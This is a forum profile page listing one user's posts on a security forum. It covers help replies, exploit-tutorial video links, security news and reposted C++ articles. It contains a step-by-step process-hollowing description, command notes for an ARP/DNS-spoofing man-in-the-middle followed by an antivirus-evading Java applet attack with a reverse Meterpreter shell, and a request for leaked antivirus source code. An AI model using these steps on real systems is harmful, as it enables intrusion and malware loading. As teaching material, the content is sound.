Everything posted by Nytro
-
Hold on, let me gaze into my crystal ball and guess what the problem with your account is...
-
The binary version can, I think, be smaller than the size of the source. At Kaspersky I know there were several products, around 2007, or whenever a source leaked, which I also have. But does any of you have source code from Norton or McAfee? Have you found it anywhere? If you find it, please post it here; there are people interested. I found some interesting things in the Kaspersky code. Edit: http://uk.reuters.com/article/2012/01/14/uk-symantec-hacker-idUKTRE80D09T20120114
-
I still have fans, even though I no longer have time to hand out bans and warnings like in my youth.
-
First, read about the structure of executables:
Portable Executable - Wikipedia, the free encyclopedia
Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format
Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2
Microsoft PE and COFF Specification
You could also look over: The .NET File Format - CodeProject®
The problem is that you want an example for .NET... I haven't really seen .NET examples; search the Programming section, you'll find many useful things there, but fewer for .NET.
You need to create a new process (suspended). Allocate space and load the executable (at ImageBase, with the size specified by the OptionalHeader, i.e. SizeOfImage). Be careful, though, to load each section aligned to the size specified in the executable's structure, after you have written the headers (the first thing you do). With that, you've loaded it into memory; it's not extremely complicated. Then all that's left is to transfer execution to the entry point. WinAPI gives you everything you need; you could do the same thing in .NET with DllImport, but there's no point. I don't know whether .NET has special classes and functions for this sort of thing; it really ought to.
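The loading steps described above lean on a handful of PE header fields (e_lfanew, SizeOfImage, ImageBase, the entry point). As a rough illustration of where those fields live in the file, here is a small Python sketch that pulls them out of a raw PE image, following the layout from the PE/COFF documents linked above; `parse_pe_header` is a made-up helper of my own, not a library function, and it only handles the common PE32 (magic 0x10B) and PE32+ (0x20B) cases:

```python
import struct

def parse_pe_header(data: bytes) -> dict:
    # DOS header: 'MZ' magic, e_lfanew (file offset of the PE header) at 0x3C
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)

    # 'PE\0\0' signature followed by the 20-byte COFF file header
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, num_sections = struct.unpack_from("<HH", data, e_lfanew + 4)

    # Optional header starts right after the COFF header
    opt = e_lfanew + 4 + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_point,) = struct.unpack_from("<I", data, opt + 16)
    if magic == 0x10B:                       # PE32: 4-byte ImageBase at +28
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    else:                                    # PE32+: 8-byte ImageBase at +24
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    (size_of_image,) = struct.unpack_from("<I", data, opt + 56)

    return {"machine": machine, "sections": num_sections,
            "entry_point": entry_point, "image_base": image_base,
            "size_of_image": size_of_image}
```

A real loader would then map each of the `sections` at its aligned virtual address before transferring control to `entry_point`; this sketch stops at reading the fields.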
-
I think you installed plain libnet at some point, and not libnet-dev. That is:
root@bt:~/libnet-1.1.5# ./configure
and not
root@bt:~/libnet-dev-1.1.5# ./configure
I don't know, it should work.
-
Did you actually read what I wrote? configure: error: libnet0 (dev) is required for this program
-
The problem is that you need the libnet development headers (that "dev" comes from "development"; libnet itself was probably already installed). I think this is it: libnet-dev | Free software downloads at SourceForge.net
-
These are extremely well known; there are many other "commands"... Open the Messenger executable with a hex editor and have a look around in there.
-
It shows up in lots of places because of this damned little icon: http://mystatus.skype.com/smallicon/sample.skype90 We'll fix it in the next day or two.
-
How to get iTunes Apps / Movies / Albums / Music for free!
Nytro replied to The_Arhitect's topic in Tutoriale in engleza
Anything longer than 10 lines and you people aren't capable of reading it and weighing in with an opinion. -
[h=4]Intro To Exploits - Part 1[/h]
http://www.youtube.com/watch?v=NzGB-8Sntqc&feature=player_embedded
Description: **This video and Part 2 Segment 1 are more lecture based videos** What's in this video?
-Coding Practices
-Defining Functions of Interest
-Introduction To Shellcode
I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong speaker.
Sursa: Intro To Exploits - Part 1

[h=4]Intro To Exploits - Part 2 (Shellcode)[/h]
http://www.youtube.com/watch?v=-QlaRVn1K1o&feature=player_embedded
Description: I recommend watching in full-screen due to quality issues. This is the first of two videos for part 2 of 5. The topic of discussion for this video is an expanded explanation of shellcode.
-How shellcode is executed
-Architecture types
-Assembly/hex examples
Also, sorry about how I was talking in the video, I'm not a strong speaker.
Sursa: Intro To Exploits - Part 2 (Shellcode)

[h=4]Intro To Exploits - Part 2 (Shellcode Cont.)[/h]
http://www.youtube.com/watch?v=m-AxrZxvu8o&feature=player_embedded
Description: ****This video demonstrates the concepts of how shellcode works**** I recommend watching in full-screen due to quality issues. This is the second of two videos for part 2 of 5. This video expands even more on the previous video, and we end Part 2 with a visual example of how shellcode operates.
-Different purposes of shellcode
-Security evasion
-Visual example of shellcode in action (bind and reverse shells)
Sursa: Intro To Exploits - Part 2 (Shellcode Cont.)

[h=4]Intro To Exploits - Part 3 (Fuzzing)[/h]
http://www.youtube.com/watch?v=v3wOMXZykrE&feature=player_embedded
Description: The topic of this video is fuzzing. At the end of Part 3, we fuzz a simple tcp echo server.
-Types of Fuzzers
-How to know if a fuzzer was successful
-Finding buffer size
I hope you learned a lot, as fuzzing is very undocumented outside of the security industry, and the technique itself is mostly used for auditing many programs with a generic testing tool. The downside of fuzzing is that it is very limited in what it can test, and in how deep into a program it can test. Fuzzing is more of an entry-point stress test than full-on code auditing.
Sursa: Intro To Exploits - Part 3 (Fuzzing)

[h=4]Intro To Exploits - Part 4 (Reverse Engineering)[/h]
http://www.youtube.com/watch?v=kMWc1PiKWUQ&feature=player_embedded
Description: ****Topic for the video is Reverse Engineering**** This video covers the basics of disassembling/reverse engineering. This is a great video, as I show you how to explore different functions within gdb. This is an awesome tactic for determining what a program might be able to do.
-Exploring the CPU
-Differentiating functions from other stack procedures
-Finding functions and disassembling them
-Finding return addresses
Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow. Sorry for the pause halfway through the video. I rage-quit halfway through filming it.
Sursa: Intro To Exploits - Part 4 (Reverse Engineering)

[h=4]Intro To Exploits - Part 5 (Scenario)[/h]
http://www.youtube.com/watch?v=5iUaq_H6wf8&feature=player_embedded
Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended as a solution to the IO wargame.*** What's in this video? In this video, we put together all of the information we have learned from the previous videos, and apply it to a practical (but very unlikely) buffer overflow situation.
-On the fly exploitation (IO smashthestack level 5)
Sursa: Intro To Exploits - Part 5 (Scenario)

[h=4]Intro To Exploits - Part 5 (Scenario Cont.)[/h]
http://www.youtube.com/watch?v=NzD67lD9OQU&feature=player_embedded
Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended to be used as a solution to the IO wargame.*** This video concludes the previous video, and the series. I hope I have helped new people learn a lot, and refreshed the memories of the more seasoned folks. Thank you for watching!
Sursa: http://www.securitytube.net/video/2649
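The "finding buffer size" step from Part 3 is usually done with a cyclic pattern, in the style of Metasploit's pattern_create / pattern_offset tools: you send a non-repeating pattern, and whatever bytes land in the instruction pointer tell you the offset. A rough Python sketch of the idea (the function names here are mine, not from the videos):

```python
import string

def pattern_create(length: int) -> bytes:
    # Non-repeating Upper/lower/digit triplets: Aa0Aa1...Zz9 (max 20280 bytes)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(value: bytes, length: int = 20280) -> int:
    # Offset of the crash bytes inside the pattern, or -1 if not found
    return pattern_create(length).find(value)
```

After the fuzzed program crashes, the bytes observed in the saved return address are looked up with `pattern_offset` to recover exactly how many bytes precede the overwrite.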
-
[h=4]Cracking Hashes From A Meterpreter Session With Hashcat[/h] Description: Cracking hashes from a Meterpreter session with Hashcat. Follow @sL0ps. Sursa: Cracking Hashes From A Meterpreter Session With Hashcat
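For anyone curious what "cracking" means mechanically, it is just hashing candidate passwords and comparing against the target. A toy dictionary attack in Python follows; note that this uses MD5 purely because it ships in hashlib, whereas the hashes dumped from a Meterpreter session are NTLM (MD4 over the UTF-16LE password). Hashcat runs the same candidate-hash-compare loop, just at GPU scale:

```python
import hashlib

def crack_md5(target_hex, wordlist):
    # Hash each candidate and compare against the target digest;
    # returns the recovered plaintext, or None if the wordlist misses.
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hex:
            return word
    return None
```

The whole game is wordlist quality and hash rate, which is exactly what hashcat's rule engine and GPU kernels optimise.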
-
[h=4]Shellcode2Exe Shellcode Analysis[/h] http://www.youtube.com/watch?v=FTDZyYt7Fqk&feature=player_embedded Description: Converting shellcode into an executable is a simple analysis technique that allows you to use your favorite debugger to analyze the code at run time. This video describes the input and output formats supported by the Shellcode2Exe tool. Sursa: Shellcode2Exe Shellcode Analysis
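Conceptually, converting shellcode to an executable just means embedding the raw bytes in a tiny host program whose entry point jumps to them; the resulting binary can then be loaded in any debugger. A minimal Python sketch of that wrapping step (it only generates C source and does not compile or execute anything; `shellcode_to_c` is a hypothetical helper of mine, not the actual Shellcode2Exe tool):

```python
def shellcode_to_c(shellcode: bytes) -> str:
    # Emit a C file that places the bytes in a global buffer and
    # jumps to it, which is conceptually what Shellcode2Exe automates.
    hex_bytes = ", ".join(f"0x{b:02x}" for b in shellcode)
    return (
        f"unsigned char code[] = {{ {hex_bytes} }};\n"
        "int main(void) {\n"
        "    /* A real tool must place the bytes in executable memory\n"
        "       (VirtualAlloc / mprotect) before jumping to them. */\n"
        "    ((void (*)(void))code)();\n"
        "    return 0;\n"
        "}\n"
    )
```

On modern systems with DEP/NX the generated stub also has to mark the buffer executable, which is why real converters call VirtualAlloc or mprotect first.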
-
[h=4]Scdbg - Shellcode Analysis[/h] Description: This video covers basic use of the scdbg tool to analyze several types of shellcode. scdbg is a tool written around the libemu library which runs shellcode in an emulated environment and displays all of the Windows API calls made during execution. scdbg also includes an integrated debug shell and complex options such as a report mode which tells you intimate details about how the shellcode was constructed. scdbg is open source and freely available. Versions are available for both Windows and Linux. Homepage: RE Corner Sursa: Scdbg - Shellcode Analysis
-
[h=3]New Generic Top-Level Domains (gTLDs) out for Sale[/h]
Published: 2012-01-13, Last Updated: 2012-01-13 15:44:20 UTC by Guy Bruneau (Version: 1)

Yesterday ICANN started accepting applications for new generic top-level domains (gTLDs). "The world of .com, .gov, .org and 19 other gTLDs will soon be expanded to include all types of words in many different languages. For the first time generic TLDs can include words in non-Latin languages, such as Cyrillic, Chinese or Arabic." [1]

Last month, the US Federal Trade Commission indicated it has concerns with this change: it worries that consumer protection safeguards against bad actors are insufficient, which could lead to a risk of abuse through existing scams such as phishing sites. [2]

Do you see these changes as having potential for concern and abuse, or is it just business as usual?

[1] ICANN | New gTLDs Update: Applications Accepted Today; New Guidebook Posted; Financial Assistance for Qualifying Applicants
[2] http://www.ftc.gov/os/closings/publicltrs/111216letter-to-icann.pdf
[3] Home | ICANN New gTLDs
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
Sursa: ISC Diary | New Generic Top-Level Domains (gTLDs) out for Sale
-
[h=1]Microsoft confirms UEFI fears, locks down ARM devices[/h]
[h=3]By Aaron Williamson | January 12, 2012[/h]
At the beginning of December, we warned the Copyright Office that operating system vendors would use UEFI secure boot anticompetitively, by colluding with hardware partners to exclude alternative operating systems. As Glyn Moody points out, Microsoft has wasted no time in revising its Windows Hardware Certification Requirements to effectively ban most alternative operating systems on ARM-based devices that ship with Windows 8.

The Certification Requirements define (on page 116) a "custom" secure boot mode, in which a physically present user can add signatures for alternative operating systems to the system's signature database, allowing the system to boot those operating systems. But for ARM devices, Custom Mode is prohibited: "On an ARM system, it is forbidden to enable Custom Mode. Only Standard Mode may be enable." [sic] Nor will users have the choice to simply disable secure boot, as they will on non-ARM systems: "Disabling Secure [boot] MUST NOT be possible on ARM systems." [sic] Between these two requirements, any ARM device that ships with Windows 8 will never run another operating system, unless it is signed with a preloaded key or a security exploit is found that enables users to circumvent secure boot.

While UEFI secure boot is ostensibly about protecting user security, these non-standard restrictions have nothing to do with security. For non-ARM systems, Microsoft requires that Custom Mode be enabled—a perverse demand if Custom Mode is a security threat. But the ARM market is different for Microsoft in three important respects:

1. Microsoft's hardware partners are different for ARM. ARM is of interest to Microsoft primarily for one reason: all of the handsets running the Windows Phone operating system are ARM-based. By contrast, Intel rules the PC world. There, Microsoft's secure boot requirements—which allow users to add signatures in Custom Mode or disable secure boot entirely—track very closely to the recommendations of the UEFI Forum, of which Intel is a founding member.

2. Microsoft doesn't need to support legacy Windows versions on ARM. If Microsoft locked unsigned operating systems out of new PCs, it would risk angering its own customers who prefer Windows XP or Windows 7 (or, hypothetically, Vista). With no legacy versions to support on ARM, Microsoft is eager to lock users out.

3. Microsoft doesn't control sufficient market share on mobile devices to raise antitrust concerns. While Microsoft doesn't command quite the monopoly on PCs that it did in 1998, when it was prosecuted for antitrust violations, it still controls around 90% of the PC operating system market—enough to be concerned that banning non-Windows operating systems from Windows 8 PCs will bring regulators knocking. Its tiny stake in the mobile market may not be a business strategy, but for now it may provide a buffer for its anticompetitive behavior there. (However, as ARM-based "ultrabooks" gain market share, this may change.)

The new policy betrays the cynicism of Microsoft's initial response to concerns over Windows 8's secure boot requirement. When kernel hacker Matthew Garrett expressed his concern that PCs shipped with Windows 8 might prevent the installation of GNU/Linux and other free operating systems, Microsoft's Tony Mangefeste replied, "Microsoft’s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves." It is clear now that opportunism, not philosophy, is guiding Microsoft's secure boot policy.

Before this week, this policy might have concerned only Windows Phone customers. But just yesterday, Qualcomm announced plans to produce Windows 8 tablets and ultrabook-style laptops built around its ARM-based Snapdragon processors. Unless Microsoft changes its policy, these may be the first PCs ever produced that can never run anything but Windows, no matter how Qualcomm feels about limiting its customers' choices.

SFLC predicted in our comments to the Copyright Office that misuse of UEFI secure boot would bring such restrictions, already common on smartphones, to PCs. Between Microsoft's new ARM secure boot policy and Qualcomm's announcement, this worst-case scenario is beginning to look inevitable.

Sursa: Microsoft confirms UEFI fears, locks down ARM devices - SFLC Blog - Software Freedom Law Center
-
[h=4]Iphone Forensics - On Ios 5[/h] Description: The goal of iPhone forensics is to extract data and artifacts from an iPhone without altering the information on the device. This video explains the technical procedure and the challenges involved in extracting data from a live iPhone. iPhone Forensics | InfoSec Institute – IT Training and Information Security Resources Sursa: Iphone Forensics - On Ios 5
-
Using Set's Java Applet Attack To Bypass Anti-Virus Software
Nytro posted a topic in Tutoriale video
[h=4]Using Set's Java Applet Attack To Bypass Anti-Virus Software[/h]
Description: Demonstration of SET's Java Applet Attack to bypass anti-virus software and obtain a Meterpreter shell.
Video Notes:
ifconfig (View NIC information)
macchanger -a eth0 (Change MAC address)
nmap -sn -n 10.10.100.* | grep Nmap (Scan for hosts)
route -n (Identify the gateway)
10.10.100.254 (Gateway)
10.10.100.30 (Attacker)
10.10.100.16 (Victim)
ping 10.10.100.16 (Verify connectivity)
echo 1 > /proc/sys/net/ipv4/ip_forward (Enable IP forwarding)
cat /proc/sys/net/ipv4/ip_forward (View status of IP forwarding)
pico dns (Create DNS table for dnsspoof)
arpspoof -i eth0 -t 10.10.100.254 10.10.100.16 (Man-in-the-middle attack, part 1)
arpspoof -i eth0 -t 10.10.100.16 10.10.100.254 (Man-in-the-middle attack, part 2)
dnsspoof -i eth0 -f dns (Website redirect)
SET menu:
1 -> Social Engineering Attacks
2 -> Website Attack Vectors
1 -> Java Applet Attack Method
2 -> Website Cloner
13 -> ShellCodeExec Alphanum Shellcode
1 -> Windows Meterpreter Reverse TCP
I apologize in advance for the poor editing and TTS narrator. My next videos should be better. Thanks
Sursa: Using Set's Java Applet Attack To Bypass Anti-Virus Software -
[h=4]Metasploit Framework Post Exploitation - Windows Security Center[/h] Description: Quick demo of the post-exploitation phase with the Metasploit Framework, plus some tips about the Windows Security Center and the system notifications. Sursa: Metasploit Framework Post Exploitation - Windows Security Center
-
[h=2]C / C++ Low Level Curriculum part 2: Data Types[/h]
Alex Darby 12:00 pm on November 24, 2011

[h=2]Prologue[/h]
Hello and welcome to the 2nd part of the C / C++ low level curriculum series of posts that I’m currently doing. Here’s a link to the first one if you missed it: http://altdevblogaday.com/2011/11/09/a-low-level-curriculum-for-c-and-c/

This post is going to be a little lighter than most of the other posts in the series, primarily because this post is vying for my spare time with my urge to save a blonde girl with pointy ears from the skinny androgynous Demon Lord of extended monologue in a virtual universe powered by three equilateral triangles.

Before we continue, I’d like to quickly bring to public note a book that has now been recommended to me many times as a result of the first post: http://www1.idc.ac.il/tecs

I can’t personally vouch for it, but I fully intend to buy it and grok its face off as soon as I get some spare time in my schedule. This book looks awesome, and if it is half as good as it looks to be then reading it should be an extremely worthwhile investment of your time…

[h=3]Assumptions[/h]
The next thing on my agenda is to discuss assumptions. Assumptions are dangerous. Even by writing this I am making many assumptions – that you have a computer, that you can read and understand The Queen’s English, and that on some level you care about understanding the low-level of C++ to name but a few. Consequently, dear reader, I feel that it’s worth mentioning what I assume about you before I go any further.

The important thing, I guess, that I should mention is that I assume that you are already familiar with and comfortable using C and/or C++. If you’re not, then I’d advise you to go and get comfortable before you read any more of this.

[h=2]Data Types?[/h]
So, again, I find myself almost instantly qualifying the title of the post and explaining what I mean when I say data types.
What I am talking about is the “Fundamental” types of C++ and what you should know about how they relate to the machine level – even this seemingly straightforward aspect of C++ is not necessarily what you would expect; especially when dealing with multiple target platforms.

Whilst this isn’t the kind of information that will suddenly improve your code by an order of magnitude, it is (in my opinion) one of the key building blocks of understanding C / C++ at the low level; as it has tonnes of potential knock-on effects in terms of speed of execution, memory layout of complex types etc. Certainly, no-one ever sat me down and explained this to me, I just sort of absorbed it or looked it up over the years.

[h=2]Fundamental and Intrinsic Types[/h]
The fundamental types of C/C++ are all the types that have a language keyword. These are not to be confused with the intrinsic types, which are the types that are natively handled by some given CPU (i.e. the data types that the machine instructions of that CPU operate on).

Whenever you use new hardware you should check how the compiler for your platform is representing your fundamental types. The best way to do this is (can you guess?) to look at the disassembly window. These days all fundamental types of C++ can be represented by an intrinsic type on most platforms; but you definitely shouldn’t take this for granted, it has only really been the case since the current console hardware generation.

There are 3 categories of fundamental type: integer, floating, and void. As we all know, the void type cannot be used to store values. It is used to specify “no type”. For both integral and floating point types there is a progression of types that can hold larger values and/or have more numerical precision. For integers this progression is (from least to most precision) char, short, int, long, long long; and for floats: float, double, long double.
Clearly, the numerical value limits that a given type must be able to store mandate a certain minimum data size for that type (i.e. the number of bits needed to store the prescribed values in binary).

[h=2]Sizes of Fundamental types[/h]
As far as I have been able to discover, the C and C++ standards make no explicit guarantee about the specific size of any of the Fundamental types. There are, however, several key rules about the sizes of the various types, which I have paraphrased below:

1. A char must be a minimum of 8 bits.
2. sizeof( char ) == 1.
3. If a pointer of type char* points at the very first address of a contiguous block of memory, then every single address in that block of memory must be traversable by simply incrementing that pointer.
4. The C standard specifies a value that each of the integer types must be able to represent (see page 33 in this .pdf of the C standard if you want the values - see the header of a standard conformant C++ implementation for details of the values used by your compiler).
5. The C++ standard says nothing about size, only that “There are five standard signed integer types : “signed char”, “short int”, “int”, “long int”, and “long long int”. In this list, each type provides at least as much storage as those preceding it in the list.” (see page 75 in this .pdf of the latest C++ standard I could find).

4 & 5 have similar rules in the C and C++ standard for the progression of floats. Helpfully, MSDN has a useful summary of this information (though it’s partly MSVC specific, it’s a good starting point). Despite all this leeway in the standard, the size of the fundamental types across PC and current gen console platforms is (to the best of my knowledge) relatively consistent.

The C++ standard also defines bool as an integral type. It has two values, true and false, which can be implicitly converted to and from the integer values 1 and 0 respectively; and is the return type of all the logical operators (==, !=, >, < etc.).
As far as I have been able to ascertain, the standard only specifies that bool must be able to represent a binary state. Consequently, the size of bool can vary dramatically according to compiler implementation, and even within code generated by the same compiler – I have seen it vary between 1 and 4 bytes on platforms I’ve used – I have always assumed that this was down to speed of execution vs. storage size tradeoffs.

This ‘size of bool’ issue resulted in the use of bool being banned from complex data structures at at least one company that I have worked at. I should clarify that this was a ‘proactive’ banning based on the fact that it might cause trouble, rather than one that resulted from trouble actually having been caused.

We should also mention enums at this point (thanks John!) – the standard gives the storage value of an enumerated type the liberty to vary in size depending on the range of values represented by each specific enum – even within the same codebase – so an enum with values < 255 (or <= 256 members with no values assigned) may well have sizeof() == 1, and one which has to represent 32 bit values would typically have sizeof() == 4.

This brings us onto pointers. Strictly speaking pointers are not defined as one of the fundamental types, but the value of a pointer clearly has a corresponding data size so we’re covering them here. The first thing to note about pointers is that the numeric limits required for a pointer on any given platform are determined by the size of the addressable memory on that platform. If you have 1 GB of memory that must be accessible in 1 byte increments, then a pointer needs to be able to hold values up to ((1024 * 1024 * 1024) – 1), which is (2^30 - 1) or 30 bits. 4GB is the most that can be addressed with a 32 bit value – which is why win32 systems can’t make use of more than 4GB. For example, when compiling for win32 with VS2010, pointers are 32 bit (i.e. sizeof() == 4), and when compiling for OSX with XCode (on the Macbook Pro I use at work for iOS development) pointers are also 32 bit (sizeof() == 4).

One thing that is definitely worth noting is that all data pointers produced by a given compiler will be the same size (n.b. this is not true of function pointers). The type of a pointer is, after all, a language level abstraction – under the hood they are all just a memory address. This is also why they can all be happily converted to and from void* – void* being a ‘typeless pointer’ (n.b. function pointers cannot be converted to or from void*). That said, knowing the type of the pointer is absolutely crucial to the low level of many of the higher level language mechanisms – as we shall see in later posts.

[h=3]Addendum[/h]
So, following on from a couple of the comments, I need to cover function pointers as separate from data pointers. I made an incorrect assertion that all pointers were the same size. This is only true of data pointers. Function pointers can be of different sizes precisely because they are not necessarily just memory addresses – in the case of multiply inherited functions or virtual functions they are typically structures.
I recommend the blog that Bryan Robertson linked me to, as it gives a concrete example of why pointers to member functions often need to be more than a memory address: http://blogs.msdn.com/b/oldnewthing/archive/2004/02/09/70002.aspx

I also found these useful links relating to function pointers and void* (this whole site is pretty damn useful in fact):
http://www.parashift.com/c++-faq-lite/pointers-to-members.html#faq-33.10
http://www.parashift.com/c++-faq-lite/pointers-to-members.html#faq-33.11

Thanks to Bryan and Jalf for pushing me to find out more.

[h=2]Intrinsic Types used by Fundamental Types[/h]
As I mentioned up front, this varies between the various platforms – and even then there’s no guarantee that the compiler will do the “sensible” thing and use all the intrinsic types supported by the platform you’re using. Here is a screenshot of a win32 console app I knocked up that prints the sizes of the Fundamental types as created by compiling for win32 under VS2010:

C++ Fundamental types (win32 compiled on Windows 7 with VS2010)

My home machine is a 64 bit intel thing of some description, about a year old. Since the processor is 64 bit, I’d hope that all of these sizes correspond to intrinsic types (8 bytes being the size of a 64 bit CPU register); however, since I’m compiling for win32 (which can only fit 4 bytes in a standard CPU register) I’m guessing that it won’t be using intrinsics for types > 32 bit.

adding 2 long long values and storing the result in a 3rd long long

In any event, I can’t be sure without looking at the disassembly. <…pause to add some simple test code with long long and run it…> Sure enough, these 8 byte long long values are being handled as 2 32bit values. Ignoring the actual addition, you can clearly see this because the code initialising llTest and llTest2 is setting them in two separate steps for the upper and lower 32 bits of the 64 bit values.
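The article's advice, i.e. check for yourself what sizes your toolchain uses, can also be followed without opening the disassembly window: Python's ctypes module reports the sizes the platform's C compiler uses for the fundamental types. A quick sketch of my own (not the article's original win32 program):

```python
import ctypes

# The C fundamental types as this platform's C ABI defines them;
# ctypes mirrors the sizes the article suggests you verify yourself.
for name, ctype in [("char", ctypes.c_char), ("short", ctypes.c_short),
                    ("int", ctypes.c_int), ("long", ctypes.c_long),
                    ("long long", ctypes.c_longlong),
                    ("float", ctypes.c_float), ("double", ctypes.c_double),
                    ("void*", ctypes.c_void_p)]:
    print(f"sizeof({name}) = {ctypes.sizeof(ctype)}")
```

Running this on a 32-bit versus a 64-bit build of the interpreter shows exactly the kind of platform variation (notably in long and void*) that the article is warning about.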
So now I know, and it wasn’t even scary – really I should go and check the rest of them…

[h=2]Fancy Intrinsics[/h]
Most modern CPUs have fancy intrinsics – e.g. 128 bit vector registers that can store and operate on four-32bit-floats-in-one-value sort of stuff. In theory these sorts of extra intrinsics can provide big wins in certain situations – e.g. heavy duty chunks of vector maths, or non vector maths that can be parallelised into vectors. The chances are that your compiler won’t ever use these without you asking it nicely. There are plenty of good reasons why this is the case (apparently), but you should find that support for these hardware specific intrinsics will be mentioned in your hardware / compiler manuals.

[h=2]Summary[/h]
So, what would I like you to take away from this? Firstly, that there is a difference between the data types of the C++ language and the hardware data types. Secondly, don’t just trust that your compiler is doing what would intuitively seem sensible to you. Check its work. Thirdly, it’s not rocket science! You can find out by just modifying one of the sample programs for your new hardware and then looking at the disassembly in the debugger.

Finally, I thought I might insert a few points of note here:
- Almost all CPUs have 8 bit bytes. Any CPU with more than 8 bits per byte was probably designed by a maniac / genius (n.b. I find that there is a particularly fine line between the two in Computer Science circles).
- One thing you need to watch out for with numerical types is that in the C standard, int and short both have the same numerical limit (unsigned int and unsigned short both have 0xFFFF (i.e. 16 bits)). I’ve never had a problem with it, but an int could be represented as 16 bit.
- If you want to know the size of any given type just use the sizeof() keyword. Your compiler knows these things.

[h=2]Epilogue[/h]
If you are hungry for more information on this level (i.e. fundamental and intrinsic types) I recommend searching #AltDevBlogADay, because there are loads to choose from… Here are a few articles I found when doing a quick search (apologies to those whose articles I missed as a result of less than thorough searching!):
http://altdevblogaday.com/2011/08/21/practical-flt-point-tricks/
http://altdevblogaday.com/2011/08/06/demise-low-level-programmer/
http://altdevblogaday.com/2011/11/10/optimisation_lessons/

Sursa: http://altdevblogaday.com/2011/11/24/c-c-low-level-curriculum-part-2-data-types/
-
A Low Level Curriculum for C and C++
Alex Darby 4:00 am on November 9, 2011

Background
In my last post, Why I became an Educator, I was bemoaning the lack of focus on Low Level understanding that seems to have afflicted Computer Science degree courses of recent times (at least in the UK…). As a result, I received a comment from someone called Travis Woodward that said:

There are plenty of students out there who are more than willing to dive into low level stuff, but its hard to know where to start or even what to learn (the old ‘you don’t know what you don’t know’ problem). I’ve looked around for something approaching a low level curriculum, but they tend to just be lists of topics which aren’t actually that helpful without context and suggested resources to start you off. The best intro I’ve found so far is a course called CS107: Programming Paradigms from Stanford on iTunesU, which has a good section on how C and C++ look to a compiler. So if any low level programmers want to put together a low level curriculum with suggested resources, then please do!

This is of course a commendable idea, and so I decided to get started on it…

Low Level Curriculum?
Before I go any further, I’d like to clarify what I mean by “Low Level Curriculum”. During my time in the industry I’ve helped architect and build a multi-platform once-Next-Gen-now-current-gen engine and tool chain, I’ve written plenty of shaders, tracked down countless hideous bugs by looking at disassembly and memory windows, hunted down the odd submission-blocking threaded race condition, and on several occasions had to hand-unpick the broken stacks of core dumps from PS3 / X360 test decks to find bugs that only occur “in the wild”; but that doesn’t make me a low level programmer – this is the kind of thing I’d expect anyone with my sort of experience to have done.
I’ve never sat for hours poring over GPad or Pix captures, I’ve never really had to worry about stuff like patching fragment shaders or batched physics calculations on SPUs, or how to get the most from my AltiVecs, and I’ve certainly never had to re-code large chunks of code in assembler taking advantage of caching or sneaky DMA modes to get a few extra FPS out of anything – this is what low level programmers do: platform specific, hardware optimised code usually written to get the best performance out of a machine. This curriculum is not about learning to be a low level programmer.

What it is about is gaining a solid understanding of the low level implementational underpinnings of C and C++ * – an understanding that I strongly feel should be the base line for any programmer working in games. Over the course of however many posts this eventually takes up I’ll be covering:
- Data types
- Pointers, Arrays, and References
- Functions and the Stack
- The C++ object model (several posts)
- Memory (again, several posts)
- Caches

Assuming you read and understand all of the posts in this series – and that I manage to communicate the information effectively – you should end up in a place where for any given “foible” of the language you understand not only that it exists but also – and most crucially – why it exists. For example, you may (or may not) know that virtual function calls don’t work in constructors; before the end of this series of posts you will understand why they can’t work in constructors.

Again just to be clear, I’m not necessarily talking about the same level of understanding of this as someone who writes compilers for their day job; but certainly a level of understanding that gives you a much better idea of what is likely to be going on at the level of the underlying engine that C++ sits on top of, and which consequently enables you to far better understand the implications of the code you write.

* N.B. to be 100% clear, C will be covered strictly as a subset of C++.
There is no source code available for the current location.

Aieeee! Spare me the hexadecimal! I’m sure the vast majority of programmers who use Visual Studio freak out the first few times they see this dialog. I know I did.

I learned to program primarily on green-screen (or orange, if the green screens were taken) dumb terminals in a Unix mainframe environment. You know, like they have in old films like Alien. The second and third year students had priority use of the XWindows machines (and the few Silicon Graphics workstations were for 3rd year graphics projects only), so dumb terminals were where I learned my trade. Even on the XWindows machines there was no programming IDE that I was aware of – I used EMACS and GNU makefiles, and the only debugger I had use of was command line GDB, which is not what you’d call user-friendly. I got by with std::cout.

When I graduated I went from this world of bakelite keyboards, screen burn, and command lines into the bright world of Windows 95 development using Visual Studio 4 (slightly before DirectX and hardware accelerated graphics). When I first saw this dialog box you can bet your life I freaked out – and why wouldn’t I? Thanks to the language syntax and code architecture focussed high level teaching methods employed by my university, I had no more idea of what went on behind the veil of the compiler than my brief forays into debugging with GDB had afforded me. I’d just got a degree from a well-respected university where they had altogether avoided teaching me about assembler as part of the main syllabus, and I had assumed it was because they were worried it was too much for my puny mind to deal with.

Suffice to say, I got over the freaking out part – but I still saw this dialog as a “No Entry” sign for far longer than I’d like to admit. I only really started to get over it a few years later, when I was working closely with someone who had got a job in games on the strength of their assembler programming.
I had a crash, and they just casually leant over and clicked the “Show Disassembly” button. Then, equally casually, they showed me exactly why my code was crashing – explaining it in terms of how C++ maps to assembler – and told me how to fix it. This blew my mindgaskets three times over, because:

this person was so casual about it
disassembly clearly wasn’t the black magic it appeared to be, given it was so simple
I couldn’t believe I hadn’t been taught about the low level innards of C++ at university

Rending the Veil of Disassembly

